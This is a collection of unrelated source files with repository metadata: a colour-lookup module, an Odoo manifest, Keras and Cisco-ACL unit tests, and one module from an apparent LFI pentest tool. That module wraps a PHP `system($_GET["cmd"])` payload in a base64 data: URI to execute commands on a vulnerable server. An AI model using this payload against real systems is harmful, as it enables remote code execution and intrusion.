'violetred4': (0.5450980392156862, 0.13333333333333333, 0.3215686274509804),
'wheat': (0.9607843137254902, 0.8705882352941177, 0.7019607843137254),
'wheat1': (1.0, 0.9058823529411765, 0.7294117647058823),
'wheat2': (0.9333333333333333, 0.8470588235294118, 0.6823529411764706),
'wheat3': (0.803921568627451, 0.7294117647058823, 0.5882352941176471),
'wheat4': (0.5450980392156862, 0.49411764705882355, 0.4),
'white': (1.0, 1.0, 1.0),
'whitesmoke': (0.9607843137254902, 0.9607843137254902, 0.9607843137254902),
'yellow': (1.0, 1.0, 0.0),
'yellow1': (1.0, 1.0, 0.0),
'yellow2': (0.9333333333333333, 0.9333333333333333, 0.0),
'yellow3': (0.803921568627451, 0.803921568627451, 0.0),
'yellow4': (0.5450980392156862, 0.5450980392156862, 0.0),
'yellowgreen': (0.6039215686274509, 0.803921568627451, 0.19607843137254902),
}
color_list = []
def recalc_color_list():
global color_list
color_list = list(color_dict.keys())
color_list.sort()
def lookup_color(name, format='tuple'):
color = color_dict[name]
if format == 'tuple':
return color
elif format == 'hash':
return "#%02x%02x%02x" % (
int(color[0]*255), int(color[1]*255), int(color[2]*255))
else:
raise ValueError("format needs to be 'tuple' or 'hash'")
def add_color(name, tup):
global color_dict
color_dict[name] = tup
recalc_color_list()
def remove_color(name):
global color_dict
del color_dict[name]
recalc_color_list()
def get_colors():
return color_list
def scan_rgbtxt(filepath):
with open(filepath, 'r') as in_f:
buf = in_f.read()
res = {}
for line in buf.split('\n'):
match = re.match(r"^\s*(\d+)\s+(\d+)\s+(\d+)\s+([\w_]+)\s*$", line)
if match:
r, g, b, name = match.groups()
r = float(r) / 255.0
g = float(g) / 255.0
b = float(b) / 255.0
name = name.lower()
res[name] = (r, g, b)
return res
# create initial color list
recalc_color_list()
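# Illustrative sketch of the helpers above; the color name 'examplegray' is a
# made-up value used only for this example and is removed again at the end.
def _example_color_usage():
    triple = lookup_color('white')                 # (1.0, 1.0, 1.0)
    hashed = lookup_color('white', format='hash')  # '#ffffff'
    add_color('examplegray', (0.5, 0.5, 0.5))      # registers it and refreshes color_list
    assert 'examplegray' in get_colors()
    remove_color('examplegray')
    return triple, hashed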
if __name__ == "__main__":
import sys, pprint
res = scan_rgbtxt(sys.argv[1])
pprint.pprint(res)
#END
|
eteq/ginga
|
ginga/colors.py
|
Python
|
bsd-3-clause
| 48,361 | 0.000186 |
# -*- coding: utf-8 -*-
###############################################################################
#
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
{
'name': 'Base Module',
'summary': 'Base Module used by MostlyOpen Solutions.',
'version': '2.0.0',
'author': 'Carlos Eduardo Vercelino - CLVsol',
'category': 'Generic Modules/Others',
'license': 'AGPL-3',
'website': 'http://mostlyopen.org',
'depends': ['base'],
'data': [
'security/base_security.xml',
'views/base_menu_view.xml',
'views/groupings_menu_view.xml',
'views/agro_menu_view.xml',
'views/community_menu_view.xml',
'views/health_menu_view.xml',
'views/insurance_menu_view.xml',
'views/pharmacy_menu_view.xml',
'views/mfmng_menu_view.xml',
'views/res_users_view.xml',
],
'demo': [],
'test': [],
'init_xml': [],
'update_xml': [],
'installable': True,
'application': False,
'active': False,
'css': [],
}
|
MostlyOpen/odoo_addons
|
myo_base/__openerp__.py
|
Python
|
agpl-3.0
| 1,788 | 0 |
from core.techniques.LFIExec import LFIExec
from base64 import b64encode
class LFIDataURI (LFIExec):
files_exec = [
# input
{ 'path' : '', 'type' : 'data_uri' },
]
# find LFI code execution path
def check (self):
return super(LFIDataURI, self)._check (prepare_check_data_uri)
# do exec
def exploit (self, cmd):
return super(LFIDataURI, self)._exploit (prepare_exec_data_uri, cmd)
def prepare_check_data_uri (lfi, payload):
purl = lfi.pattern_url[:]
payload = 'data:text/plain;base64,' + b64encode (payload)
# payload = 'data:text/plain,' + payload
url = purl.replace (lfi.payload_placeholder, payload)
return url
def prepare_exec_data_uri (lfi, cmd):
purl = lfi.pattern_url[:]
payload_exec = '<?php echo "' + lfi.tag_start_exec + '"; system ($_GET["cmd"]); echo "' + lfi.tag_end_exec + '"; ?>'
payload = 'data:text/plain;base64,{0}&cmd={1}'.format (b64encode (payload_exec), cmd)
# payload = 'data:text/plain,{0}&cmd={1}'.format (payload_exec, cmd)
url = purl.replace (lfi.payload_placeholder, payload)
return url
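# Minimal standalone sketch (not part of the LFIExec API): shows the kind of
# URL prepare_check_data_uri builds. The _FakeLFI fields and the target URL
# below are made-up example values.
def _example_data_uri_url ():
    class _FakeLFI (object):
        pattern_url = 'http://target.example/index.php?page=PAYLOAD_HERE'
        payload_placeholder = 'PAYLOAD_HERE'
    # result: .../index.php?page=data:text/plain;base64,<base64 of the probe>
    return prepare_check_data_uri (_FakeLFI (), '<?php echo "probe"; ?>')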
|
m101/lfipwn
|
core/techniques/LFIDataURI.py
|
Python
|
agpl-3.0
| 1,128 | 0.018617 |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests specific to deferred-build `Sequential` models."""
import os
import unittest
import numpy as np
from tensorflow.python import keras
from tensorflow.python.compat import v2_compat
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
try:
import h5py # pylint:disable=g-import-not-at-top
except ImportError:
h5py = None
class TestDeferredSequential(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_build_behavior(self):
# Test graph network creation after __call__
model = get_model()
model(np.random.random((2, 6)))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [2, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [2, 2])
# Test effect of new __call__ with a different shape
model(np.random.random((3, 6)))
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
model(np.random.random((4, 6)))
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
# Test graph network creation after build
model = get_model()
model.build((None, 6))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
self.assertEqual(model.inputs[0].shape.as_list(), [None, 6])
self.assertEqual(model.outputs[0].shape.as_list(), [None, 2])
# Test graph network creation after compile/fit
model = get_model()
model.compile(
loss='mse',
optimizer='rmsprop',
metrics=[keras.metrics.CategoricalAccuracy()],
run_eagerly=testing_utils.should_run_eagerly())
model.fit(np.zeros((2, 6)), np.zeros((2, 2)))
self.assertLen(model.weights, 4)
self.assertTrue(model._is_graph_network)
self.assertLen(model.inputs, 1)
self.assertLen(model.outputs, 1)
# Inconsistency here: with eager `fit`, the model is built with shape
# (2, 6), but with graph function `fit`, it is built with shape `(None, 6)`.
# This is likely due to our assumption "the batch size should be dynamic"
# at the level of `Model`. TODO(fchollet): investigate and resolve.
self.assertEqual(model.inputs[0].shape.as_list()[-1], 6)
self.assertEqual(model.outputs[0].shape.as_list()[-1], 2)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_add_and_pop(self):
model = get_model()
model.build((None, 6))
self.assertTrue(model.built)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layers, 3)
self.assertLen(model.weights, 4)
model.pop()
self.assertTrue(model.built)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layers, 2)
self.assertLen(model.weights, 2)
model.add(keras.layers.Dense(2))
self.assertTrue(model.built)
self.assertTrue(model._is_graph_network)
self.assertLen(model.layers, 3)
self.assertLen(model.weights, 4)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_feature_extraction(self):
# This tests layer connectivity reset when rebuilding
model = get_model()
model(np.random.random((3, 6))) # First build
model(np.random.random((4, 6))) # Triggers a rebuild
# Classic feature extractor pattern
extractor = keras.Model(inputs=model.inputs,
outputs=[layer.output for layer in model.layers])
# Check that inputs and outputs are connected
_ = extractor(np.random.random((4, 6)))
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_saving_savedmodel(self):
model = get_model()
model(np.random.random((3, 6))) # Build model
path = os.path.join(self.get_temp_dir(), 'model_path')
model.save(path)
new_model = keras.models.load_model(path)
model_layers = model._flatten_layers(include_self=True, recursive=False)
new_model_layers = new_model._flatten_layers(
include_self=True, recursive=False)
for layer1, layer2 in zip(model_layers, new_model_layers):
self.assertEqual(layer1.name, layer2.name)
for w1, w2 in zip(layer1.weights, layer2.weights):
self.assertAllClose(w1, w2)
@unittest.skipIf(h5py is None, 'Test requires h5py')
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_saving_h5(self):
path = os.path.join(self.get_temp_dir(), 'model_path.h5')
model = get_model()
model(np.random.random((3, 6))) # Build model
path = os.path.join(self.get_temp_dir(), 'model_path.h5')
model.save(path)
new_model = keras.models.load_model(path)
model_layers = model._flatten_layers(include_self=True, recursive=False)
new_model_layers = new_model._flatten_layers(
include_self=True, recursive=False)
for layer1, layer2 in zip(model_layers, new_model_layers):
self.assertEqual(layer1.name, layer2.name)
for w1, w2 in zip(layer1.weights, layer2.weights):
self.assertAllClose(w1, w2)
@keras_parameterized.run_all_keras_modes
def test_shared_layer(self):
# This tests that preexisting layer connectivity is preserved
# when auto-building graph networks
shared_layer = keras.layers.Dense(2)
m1 = keras.Sequential([shared_layer])
m1(np.random.random((3, 6)))
m2 = keras.Sequential([shared_layer])
m2(np.random.random((3, 6)))
# Nesting case
shared_layer = keras.layers.Dense(2)
m1 = keras.Sequential([shared_layer])
m2 = keras.Sequential([shared_layer, m1])
m2(np.random.random((3, 2)))
@keras_parameterized.run_all_keras_modes
def test_loss_layer(self):
class LossLayer(keras.layers.Layer):
def call(self, inputs):
self.add_loss(math_ops.reduce_sum(inputs))
return inputs
# Test loss layer alone
model = keras.Sequential([LossLayer()])
model.compile('rmsprop', run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)))
self.assertAllClose(loss, 4.)
model(np.random.random((4, 2))) # Triggers a rebuild
loss = model.train_on_batch(np.ones((1, 2)))
self.assertAllClose(loss, 2.)
# Test loss layer combined with another layer
model = keras.Sequential([
keras.layers.Dense(1, kernel_initializer='ones'),
LossLayer()])
model.compile('rmsprop', run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)))
self.assertAllClose(loss, 4.)
model(np.random.random((4, 2))) # Triggers a rebuild
loss = model.train_on_batch(np.ones((1, 2)))
self.assertLess(loss, 2.)
# Test loss layer combined with external loss
model = keras.Sequential([
keras.layers.Dense(1, kernel_initializer='ones'),
LossLayer()])
model.compile('rmsprop', 'mse',
run_eagerly=testing_utils.should_run_eagerly())
loss = model.train_on_batch(np.ones((2, 2)), np.ones((2, 2)))
model(np.random.random((4, 2))) # Triggers a rebuild
loss = model.train_on_batch(np.ones((1, 2)), np.ones((1, 2)))
def get_model():
model = keras.models.Sequential()
model.add(keras.layers.Dense(2, name='first_layer'))
model.add(keras.layers.Dropout(0.3, name='dp'))
model.add(keras.layers.Dense(2, name='last_layer'))
return model
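# Illustrative sketch, not exercised by the tests above: a deferred-build
# Sequential only creates its weights on the first call; the (2, 6) input
# shape below is just an example.
def _deferred_build_sketch():
  model = get_model()
  model(np.random.random((2, 6)))  # first call triggers the build
  return len(model.weights)        # 4: kernel + bias for each Dense layer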
if __name__ == '__main__':
v2_compat.enable_v2_behavior()
test.main()
|
frreiss/tensorflow-fred
|
tensorflow/python/keras/engine/deferred_sequential_test.py
|
Python
|
apache-2.0
| 8,563 | 0.003503 |
# Copyright 2008 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unittest for cisco acl rendering module."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import datetime
import re
import unittest
from lib import aclgenerator
from lib import cisco
from lib import nacaddr
from lib import naming
from lib import policy
import mock
GOOD_HEADER = """
header {
comment:: "this is a test acl"
target:: cisco test-filter
}
"""
GOOD_STANDARD_HEADER_1 = """
header {
comment:: "this is a standard acl"
target:: cisco 99 standard
}
"""
GOOD_STANDARD_HEADER_2 = """
header {
comment:: "this is a standard acl"
target:: cisco FOO standard
}
"""
GOOD_STANDARD_NUMBERED_HEADER = """
header {
comment:: "numbered standard"
target:: cisco 50 standard
}
"""
GOOD_OBJGRP_HEADER = """
header {
comment:: "obj group header test"
target:: cisco objgroupheader object-group
}
"""
GOOD_INET6_HEADER = """
header {
comment:: "inet6 header test"
target:: cisco inet6_acl inet6
}
"""
GOOD_MIXED_HEADER = """
header {
comment:: "mixed inet/inet6 header test"
target:: cisco mixed_acl mixed
}
"""
GOOD_DSMO_HEADER = """
header {
comment:: "this is a dsmo test acl"
target:: cisco dsmo_acl extended enable_dsmo
}
"""
GOOD_EXTENDED_NUMBERED_HEADER = """
header {
comment:: "numbered extended"
target:: cisco 150 extended
}
"""
BAD_STANDARD_HEADER_1 = """
header {
comment:: "this is a standard acl"
target:: cisco 2001 standard
}
"""
BAD_STANDARD_HEADER_2 = """
header {
comment:: "this is a standard acl"
target:: cisco 101 standard
}
"""
BAD_HEADER = """
header {
comment:: "this is a test acl"
target:: juniper test-filter
}
"""
BAD_HEADER_2 = """
header {
target:: cisco 1300
}
"""
GOOD_STANDARD_TERM_1 = """
term standard-term-1 {
address:: SOME_HOST
action:: accept
}
"""
GOOD_STANDARD_TERM_2 = """
term standard-term-2 {
address:: SOME_HOST
action:: accept
}
"""
BAD_STANDARD_TERM_1 = """
term bad-standard-term-1 {
destination-address:: SOME_HOST
protocol:: tcp
action:: accept
}
"""
UNSUPPORTED_TERM_1 = """
term protocol_except_term {
protocol-except:: tcp udp icmp
action:: reject
}
"""
UNSUPPORTED_TERM_2 = """
term protocol_except_term {
source-prefix:: configured-neighbors-only
action:: reject
}
"""
EXPIRED_TERM = """
term is_expired {
expiration:: 2001-01-01
action:: accept
}
"""
EXPIRING_TERM = """
term is_expiring {
expiration:: %s
action:: accept
}
"""
GOOD_TERM_1 = """
term good-term-1 {
protocol:: icmp
action:: accept
}
"""
GOOD_TERM_2 = """
term good-term-2 {
protocol:: tcp
destination-address:: SOME_HOST
source-port:: HTTP
option:: established
action:: accept
}
"""
GOOD_TERM_3 = """
term good-term-3 {
protocol:: tcp
option:: tcp-established
action:: accept
}
"""
GOOD_TERM_4 = """
term good-term-4 {
protocol:: tcp
logging:: true
action:: accept
}
"""
GOOD_TERM_5 = """
term good-term-5 {
verbatim:: cisco "mary had a little lamb"
verbatim:: iptables "mary had second lamb"
verbatim:: juniper "mary had third lamb"
}
"""
GOOD_TERM_6 = """
term good-term-6 {
destination-address:: ANY
action:: accept
}
"""
GOOD_TERM_7 = """
term good-term {
protocol:: vrrp
action:: accept
}
"""
GOOD_TERM_8 = """
term good-term {
protocol:: tcp
destination-address:: SOME_HOST
action:: accept
}
"""
GOOD_TERM_9 = """
term good-term-9 {
protocol:: tcp udp
option:: established
action:: accept
}
"""
GOOD_TERM_10 = """
term good-term-10 {
protocol:: icmp
icmp-type:: echo-reply unreachable time-exceeded
action:: accept
}
"""
GOOD_TERM_11 = """
term good-term-11 {
protocol:: icmpv6
icmp-type:: echo-reply destination-unreachable time-exceeded
action:: accept
}
"""
GOOD_TERM_12 = """
term good-term-12 {
action:: accept
}
"""
GOOD_TERM_13 = """
term good-term-13 {
owner:: foo@google.com
action:: accept
}
"""
GOOD_TERM_14 = """
term good-term-14 {
protocol:: tcp
destination-address:: SOME_HOST
destination-port:: CONSECUTIVE_PORTS
action:: accept
}
"""
GOOD_TERM_15 = """
term good-term-15 {
protocol:: hopopt
action:: accept
}
"""
GOOD_TERM_16 = """
term good-term-16 {
protocol:: tcp
action:: accept
dscp-match:: 42
}
"""
GOOD_TERM_17 = """
term good-term-17 {
protocol:: tcp udp
policer:: batman
option:: established
action:: accept
}
"""
GOOD_TERM_18 = """
term good-term-18 {
source-address:: SOME_HOST
destination-address:: SOME_HOST
action:: accept
}
"""
LONG_COMMENT_TERM = """
term long-comment-term {
comment:: "%s "
action:: accept
}
"""
SUPPORTED_TOKENS = {
'action',
'address',
'comment',
'destination_address',
'destination_address_exclude',
'destination_port',
'dscp_match',
'expiration',
'icmp_type',
'logging',
'name',
'option',
'owner',
'platform',
'platform_exclude',
'protocol',
'source_address',
'source_address_exclude',
'source_port',
'translated',
'verbatim',
}
SUPPORTED_SUB_TOKENS = {
'action': {'accept', 'deny', 'reject', 'next',
'reject-with-tcp-rst'},
'icmp_type': {
'alternate-address',
'certification-path-advertisement',
'certification-path-solicitation',
'conversion-error',
'destination-unreachable',
'echo-reply',
'echo-request',
'mobile-redirect',
'home-agent-address-discovery-reply',
'home-agent-address-discovery-request',
'icmp-node-information-query',
'icmp-node-information-response',
'information-request',
'inverse-neighbor-discovery-advertisement',
'inverse-neighbor-discovery-solicitation',
'mask-reply',
'mask-request',
'information-reply',
'mobile-prefix-advertisement',
'mobile-prefix-solicitation',
'multicast-listener-done',
'multicast-listener-query',
'multicast-listener-report',
'multicast-router-advertisement',
'multicast-router-solicitation',
'multicast-router-termination',
'neighbor-advertisement',
'neighbor-solicit',
'packet-too-big',
'parameter-problem',
'redirect',
'redirect-message',
'router-advertisement',
'router-renumbering',
'router-solicit',
'router-solicitation',
'source-quench',
'time-exceeded',
'timestamp-reply',
'timestamp-request',
'unreachable',
'version-2-multicast-listener-report',
},
'option': {'established',
'tcp-established'}
}
# Print an info message when a term is set to expire in that many weeks.
# This is normally passed from command line.
EXP_INFO = 2
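# Illustrative sketch (not a test case) of the rendering pattern the tests
# below rely on: parse a policy with a mocked naming definition, then str()
# the Cisco object to get the ACL text. The helper name is an example only.
def _example_render_acl():
  fake_naming = mock.create_autospec(naming.Naming)
  pol = policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_1, fake_naming)
  return str(cisco.Cisco(pol, EXP_INFO))  # e.g. contains a 'permit 1 any any' line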
class CiscoTest(unittest.TestCase):
def setUp(self):
self.naming = mock.create_autospec(naming.Naming)
def testIPVersion(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('0.0.0.0/0'),
nacaddr.IP('::/0')]
pol = policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_6, self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
# check if we've got a v6 address in there.
self.failIf('::' in str(acl), str(acl))
self.naming.GetNetAddr.assert_called_once_with('ANY')
def testOptions(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
self.naming.GetServiceByProto.return_value = ['80']
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_2,
self.naming), EXP_INFO)
# this is a hacky sort of way to test that 'established' maps to HIGH_PORTS
# in the destination port section.
range_test = 'permit 6 any eq 80 10.0.0.0 0.255.255.255 range 1024 65535'
self.failUnless(range_test in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
self.naming.GetServiceByProto.assert_called_once_with('HTTP', 'tcp')
def testExpandingConsequtivePorts(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
self.naming.GetServiceByProto.return_value = ['80', '81']
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_14,
self.naming), EXP_INFO)
first_string = 'permit 6 any 10.0.0.0 0.255.255.255 eq 80'
second_string = 'permit 6 any 10.0.0.0 0.255.255.255 eq 81'
self.failUnless(first_string in str(acl), '[%s]' % str(acl))
self.failUnless(second_string in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
self.naming.GetServiceByProto.assert_called_once_with(
'CONSECUTIVE_PORTS', 'tcp')
def testDSCP(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_16,
self.naming), EXP_INFO)
self.failUnless(re.search('permit 6 any any dscp 42', str(acl)),
str(acl))
def testTermAndFilterName(self):
acl = cisco.Cisco(policy.ParsePolicy(
GOOD_HEADER + GOOD_TERM_1 + GOOD_TERM_6, self.naming), EXP_INFO)
self.failUnless('ip access-list extended test-filter' in str(acl), str(acl))
self.failUnless(' remark good-term-1' in str(acl), str(acl))
self.failUnless(' permit ip any any' in str(acl), str(acl))
def testRemark(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.1.1.1/32')]
# Extended ACLs should have extended remark style.
acl = cisco.Cisco(policy.ParsePolicy(
GOOD_EXTENDED_NUMBERED_HEADER + GOOD_TERM_1, self.naming), EXP_INFO)
self.failUnless('ip access-list extended 150' in str(acl), str(acl))
self.failUnless(' remark numbered extended' in str(acl), str(acl))
self.failIf('150 remark' in str(acl), str(acl))
    # Standard ACLs should have standard remark style.
acl = cisco.Cisco(policy.ParsePolicy(
GOOD_STANDARD_NUMBERED_HEADER + GOOD_STANDARD_TERM_1, self.naming),
EXP_INFO)
self.failUnless('access-list 50 remark' in str(acl), str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testTcpEstablished(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_3,
self.naming), EXP_INFO)
self.failUnless(re.search('permit 6 any any established\n',
str(acl)), str(acl))
def testLogging(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_4,
self.naming), EXP_INFO)
self.failUnless(re.search('permit 6 any any log\n',
str(acl)), str(acl))
def testVerbatimTerm(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_5,
self.naming), EXP_INFO)
self.failUnless('mary had a little lamb' in str(acl), str(acl))
    # check if other platforms' verbatim shows up in the output
    self.failIf('mary had second lamb' in str(acl), str(acl))
    self.failIf('mary had third lamb' in str(acl), str(acl))
def testBadStandardTerm(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
pol = policy.ParsePolicy(GOOD_STANDARD_HEADER_1 + BAD_STANDARD_TERM_1,
self.naming)
self.assertRaises(cisco.StandardAclTermError, cisco.Cisco, pol, EXP_INFO)
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testStandardTermHost(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.1.1.1/32')]
pol = policy.ParsePolicy(GOOD_STANDARD_HEADER_1 + GOOD_STANDARD_TERM_1,
self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
expected = 'access-list 99 permit 10.1.1.1'
self.failUnless(expected in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testStandardTermNet(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
pol = policy.ParsePolicy(GOOD_STANDARD_HEADER_1 + GOOD_STANDARD_TERM_2,
self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
expected = 'access-list 99 permit 10.0.0.0 0.255.255.255'
self.failUnless(expected in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testNamedStandard(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
pol = policy.ParsePolicy(GOOD_STANDARD_HEADER_2 + GOOD_STANDARD_TERM_2,
self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
expected = 'ip access-list standard FOO'
self.failUnless(expected in str(acl), '[%s]' % str(acl))
expected = ' permit 10.0.0.0 0.255.255.255'
self.failUnless(expected in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testNoIPv6InOutput(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('2620:0:1000::/40')]
pol = policy.ParsePolicy(GOOD_STANDARD_HEADER_1 + GOOD_STANDARD_TERM_2,
self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
self.failIf('::' in str(acl), '[%s]' % str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testStandardFilterName(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
pol = policy.ParsePolicy(BAD_STANDARD_HEADER_1 + GOOD_STANDARD_TERM_2,
self.naming)
self.assertRaises(cisco.UnsupportedCiscoAccessListError,
cisco.Cisco, pol, EXP_INFO)
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testStandardFilterRange(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8')]
pol = policy.ParsePolicy(BAD_STANDARD_HEADER_2 + GOOD_STANDARD_TERM_2,
self.naming)
self.assertRaises(cisco.UnsupportedCiscoAccessListError,
cisco.Cisco, pol, EXP_INFO)
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testObjectGroup(self):
ip_grp = ['object-group network ipv4 SOME_HOST']
ip_grp.append(' 10.0.0.0/8')
ip_grp.append('exit')
port_grp1 = ['object-group port 80-80']
port_grp1.append(' eq 80')
port_grp1.append('exit')
port_grp2 = ['object-group port 1024-65535']
port_grp2.append(' range 1024 65535')
port_grp2.append('exit')
self.naming.GetNetAddr.return_value = [
nacaddr.IP('10.0.0.0/8', token='SOME_HOST')]
self.naming.GetServiceByProto.return_value = ['80']
pol = policy.ParsePolicy(
GOOD_OBJGRP_HEADER + GOOD_TERM_2 + GOOD_TERM_18, self.naming)
acl = cisco.Cisco(pol, EXP_INFO)
self.failUnless('\n'.join(ip_grp) in str(acl), '%s %s' % (
'\n'.join(ip_grp), str(acl)))
self.failUnless('\n'.join(port_grp1) in str(acl), '%s %s' % (
'\n'.join(port_grp1), str(acl)))
self.failUnless('\n'.join(port_grp2) in str(acl), '%s %s' % (
'\n'.join(port_grp2), str(acl)))
# Object-group terms should use the object groups created.
self.failUnless(
' permit 6 any port-group 80-80 net-group SOME_HOST port-group'
' 1024-65535' in str(acl), str(acl))
self.failUnless(
' permit ip net-group SOME_HOST net-group SOME_HOST' in str(acl),
str(acl))
# There should be no addrgroups that look like IP addresses.
for addrgroup in re.findall(r'net-group ([a-f0-9.:/]+)', str(acl)):
      self.assertRaises(ValueError, nacaddr.IP, addrgroup)
self.naming.GetNetAddr.assert_has_calls([mock.call('SOME_HOST'),
mock.call('SOME_HOST')])
self.naming.GetServiceByProto.assert_called_once_with('HTTP', 'tcp')
def testInet6(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8'),
nacaddr.IP('2001:4860:8000::/33')]
acl = cisco.Cisco(policy.ParsePolicy(GOOD_INET6_HEADER + GOOD_TERM_8,
self.naming), EXP_INFO)
inet6_test1 = 'no ipv6 access-list inet6_acl'
inet6_test2 = 'ipv6 access-list inet6_acl'
inet6_test3 = 'permit 6 any 2001:4860:8000::/33'
self.failUnless(inet6_test1 in str(acl), '[%s]' % str(acl))
self.failUnless(inet6_test2 in str(acl), '[%s]' % str(acl))
self.failUnless(re.search(inet6_test3, str(acl)), str(acl))
self.failIf('10.0.0.0' in str(acl), str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testMixed(self):
self.naming.GetNetAddr.return_value = [nacaddr.IP('10.0.0.0/8'),
nacaddr.IP('2001:4860:8000::/33')]
acl = cisco.Cisco(policy.ParsePolicy(GOOD_MIXED_HEADER + GOOD_TERM_8,
self.naming), EXP_INFO)
inet6_test1 = 'no ip access-list extended mixed_acl'
inet6_test2 = 'ip access-list extended mixed_acl'
inet6_test3 = 'permit 6 any 10.0.0.0 0.255.255.255'
inet6_test4 = 'no ipv6 access-list ipv6-mixed_acl'
inet6_test5 = 'ipv6 access-list ipv6-mixed_acl'
inet6_test6 = 'permit 6 any 2001:4860:8000::/33'
aclout = str(acl)
self.failUnless(inet6_test1 in aclout, '[%s]' % aclout)
self.failUnless(inet6_test2 in aclout, '[%s]' % aclout)
self.failUnless(re.search(inet6_test3, aclout), aclout)
self.failUnless(inet6_test4 in aclout, '[%s]' % aclout)
self.failUnless(inet6_test5 in aclout, '[%s]' % aclout)
self.failUnless(re.search(inet6_test6, aclout), aclout)
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testDsmo(self):
addr_list = list()
for octet in range(0, 256):
net = nacaddr.IP('192.168.' + str(octet) + '.64/27')
addr_list.append(net)
self.naming.GetNetAddr.return_value = addr_list
acl = cisco.Cisco(policy.ParsePolicy(GOOD_DSMO_HEADER + GOOD_TERM_8,
self.naming), EXP_INFO)
